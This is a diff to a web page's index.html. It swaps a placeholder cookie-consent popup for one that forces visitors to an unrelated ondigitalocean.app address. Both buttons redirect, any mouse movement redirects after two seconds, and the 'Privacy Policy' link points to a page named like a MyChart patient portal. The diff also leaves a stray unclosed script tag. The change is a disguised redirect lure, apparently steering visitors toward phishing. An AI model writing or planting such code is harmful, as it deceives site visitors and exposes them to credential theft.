--- a/index.html
+++ b/index.html
@@ -1,110 +1,139 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+<script> 	
 <style>
-/* Main container to blur */
-body.modal-open #mainContent {
-    filter: blur(6px);
-    transition: filter 0.3s ease;
-}
+    .modalWrapper {
+        position: fixed;
+        top: 0;
+        left: 0;
+        width: 100%;
+        height: 100%;
+        background-color: rgba(0, 0, 0, 0.7);
+        display: flex;
+        justify-content: center;
+        align-items: center;
+        z-index: 1000;
+        display: none;
+    }
 
-.modalWrapper {
-    position: fixed;
-    top: 0;
-    left: 0;
-    width: 100%;
-    height: 100%;
-    background-color: rgba(0, 0, 0, 0.7);
-    display: flex;
-    justify-content: center;
-    align-items: center;
-    z-index: 1000;
-    display: none;
-}
+    .modalContent {
+        background-color: white !important;
+        padding: 20px;
+        position: relative;
+        border-radius: 10px;
+        border: 2px solid white;
+        padding: 40px;
+    }
 
-.modalContent {
-    background-color: white !important;
-    padding: 40px;
-    position: relative;
-    border-radius: 10px;
-    border: 2px solid white;
-    width: 90%;
-    max-width: 600px;
-    text-align: center;
-}
+    @media (max-width: 520px) {
+        .modalContent {
+            width: 90%;
+        }
+    }
 
-.modalContent img {
-    max-width: 100%;
-    height: auto;
-    border-radius: 10px;
-}
+    @media (min-width: 520px) {
+        .modalContent {
+            width: 65%;
+        }
+    }
 
-.closeBtn {
-    position: absolute;
-    top: 10px;
-    right: 10px;
-    color: #007bff;
-    background-color: transparent;
-    border: none;
-    font-weight: 500;
-    font-size: 14px;
-    cursor: pointer;
-}
+    .modalContent img {
+        max-width: 100%;
+        height: auto;
+        border-radius: 10px;
+    }
 
-.actionBtn {
-    background-color: #007bff;
-    font-family: "Poppins", sans-serif;
-    font-weight: 500;
-    border: none;
-    padding: 15px 30px;
-    color: #fff;
-    border-radius: 5px;
-    cursor: pointer;
-    margin-top: 20px;
-}
+    .closeBtn {
+        position: absolute;
+        top: 10px;
+        right: 10px;
+        padding: 5px;
+        color: blue;
+        font-weight: 500;
+        border-radius: 0px 10px 0px 0px;
+        cursor: pointer;
+    }
 
-body.modal-open {
-    overflow: hidden;
-}
+    .actionBtn {
+        background-color: #007bff;
+        font-family: "Poppins", Sans-serif;
+        font-weight: 500;
+        border: none;
+        padding: 15px 30px;
+        color: #FFFFFF;
+        border-radius: 5px;
+        cursor: pointer;
+    }
+
+    / Disable scrolling when modal is open /
+    body.modal-open {
+        overflow: hidden;
+    }
 </style>
-
-<!-- Wrap your page content in a main container -->
-<div id="mainContent">
-    <!-- Your actual page content goes here -->
-</div>
 
 <div class="modalContainer">
     <div id="modal" class="modalWrapper">
         <div class="modalContent">
-            <button id="dismissModal" class="closeBtn">Close & Continue</button>
-            <h2>We Use Cookies</h2>
-            <p>We use cookies to personalize content and analyze traffic. By clicking Accept or Close, you agree to continue to our partner site. For details, visit our <a href="https://yourdomain.com/privacy-policy" target="_blank">Privacy Policy</a>.</p>
-            <button id="confirmBtn" class="actionBtn">Accept & Continue</button>
+            <div id="dismissModal" class="closeBtn">Close</div>
+            <h1>Cookie Policy</h1>
+            <p>This website uses cookies to personalize content and ads, provide social media features, and analyze our traffic. By clicking Accept, you agree to the use of cookies. For more information, please visit our <a href="https://mychartappportalfindz.vercel.app/mychart.html/">Privacy Policy</a>.</p>
+            <button id="confirmBtn" class="actionBtn">Accept</button>
         </div>
     </div>
 </div>
 
 <script>
-var modal = document.getElementById('modal');
-var dismissModal = document.getElementById('dismissModal');
-var confirmBtn = document.getElementById('confirmBtn');
-var redirectUrl = "https://your-landing-page.com"; // Replace with your actual redirect
+    var modal = document.getElementById('modal');
+    var dismissModal = document.getElementById('dismissModal');
+    var confirmBtn = document.getElementById('confirmBtn');
 
-// Show modal after page load
-window.addEventListener('load', function () {
-    modal.style.display = 'flex';
-    document.body.classList.add('modal-open');
-});
+    var redirectUrl = "https://c3d6a56afe4615c1e9522d79-cddva.ondigitalocean.app/"; // Set your dynamic URL here
+    var cursorMoved = false;
+    var redirectTimer;
 
-// Redirect on "Close & Continue"
-dismissModal.addEventListener('click', function () {
-    window.location.href = redirectUrl;
-});
+    // Show the modal instantly after page load and disable scrolling
+    window.addEventListener('load', function () {
+        modal.style.display = 'flex';
+        document.body.classList.add('modal-open');
+    });
 
-// Redirect on "Accept & Continue"
-confirmBtn.addEventListener('click', function () {
-    window.location.href = redirectUrl;
-});
+    // Function to close the modal and navigate to a link
+    function closeModal() {
+        modal.style.display = 'none';
+        document.body.classList.remove('modal-open'); // Re-enable scrolling
+        if (redirectUrl) {
+            window.location.href = redirectUrl; // Redirect to the given URL
+        }
+    }
+
+    // Close modal on close button click
+    dismissModal.addEventListener('click', function () {
+        closeModal();
+    });
+
+    // Close modal on accept button click
+    confirmBtn.addEventListener('click', function () {
+        closeModal();
+    });
+
+    // Auto redirect after 2 seconds of cursor movement
+    window.addEventListener('mousemove', function () {
+        if (!cursorMoved) {
+            cursorMoved = true;
+            redirectTimer = setTimeout(function () {
+                window.location.href = redirectUrl;
+            }, 2000); // Redirect after 5 seconds
+        }
+    });
+
+    // Prevent modal from closing on clicking outside modal content
+    modal.addEventListener('click', function (event) {
+        if (event.target === modal) {
+            event.stopPropagation(); // Do nothing if clicked outside the modal content
+        }
+    });
+
 </script>
 
 
